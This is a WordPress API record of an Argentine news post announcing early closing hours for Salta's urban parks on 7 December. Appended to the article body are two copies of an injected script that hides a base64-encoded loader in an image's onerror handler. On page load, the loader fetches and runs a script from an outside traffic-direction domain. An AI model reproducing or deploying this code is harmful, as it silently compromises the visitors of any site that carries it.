{"id":3394,"date":"2023-12-06T11:22:03","date_gmt":"2023-12-06T14:22:03","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3394"},"modified":"2025-08-14T00:03:55","modified_gmt":"2025-08-14T03:03:55","slug":"manana-jueves-7-de-diciembre-los-parques-urbanos-cerraran-a-las-21-horas","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3394","title":{"rendered":"Ma\u00f1ana jueves 7 de diciembre los Parques Urbanos cerrar\u00e1n a las 21 horas"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#90092b\"><em>Los parques del Bicentenario, Sur y de la Familia permanecer\u00e1n abiertos hasta las 21 horas de ma\u00f1ana jueves 7 de diciembre; el horario normal de 7 a 23 se retomar\u00e1 el viernes 8.<\/em><\/h4>\n\n\n\n<p>Se informa a la comunidad que ma\u00f1ana&nbsp;jueves 7 de diciembre los parques del Bicentenario, Sur y de la Familia cerrar\u00e1n sus puertas a las 21 hs por razones operativas. A&nbsp;partir del viernes 8 de diciembre se retomar\u00e1 el horario normal de 7 a 23 hs.&nbsp;<\/p>\n\n\n\n<p>Se recuerda a los usuarios que se deben respetar las indicaciones del personal del parque en cuanto a evacuaci\u00f3n por razones clim\u00e1ticas o de extrema necesidad; asimismo, por seguridad, las mascotas deben ingresar con correa.&nbsp;<\/p>\n\n\n\n<p>Por otra parte, en consideraci\u00f3n a las altas temperaturas, se sugiere mantenerse hidratado y con la cabeza cubierta. &nbsp;<br>&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/maniana-jueves-7-de-diciembre-los-parques-urbanos-cerraran-a-las-21-horas-93236\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Los parques del Bicentenario, Sur y de la Familia permanecer\u00e1n abiertos hasta las 21 horas de ma\u00f1ana jueves 7 de diciembre; el horario normal de 7 a 23 se retomar\u00e1 el viernes 8. Se informa a la comunidad que ma\u00f1ana&nbsp;jueves 7 de diciembre los parques del Bicentenario, Sur y de la Familia cerrar\u00e1n sus puertas [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3395,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,11],"tags":[],"class_list":{"0":"post-3394","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-datos-utiles"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3394"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3394"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3394\/revisions"}],"predecessor-version":[{"id":6899,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3394\/revisions\/6899"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3395"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3394"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3394"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3394"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}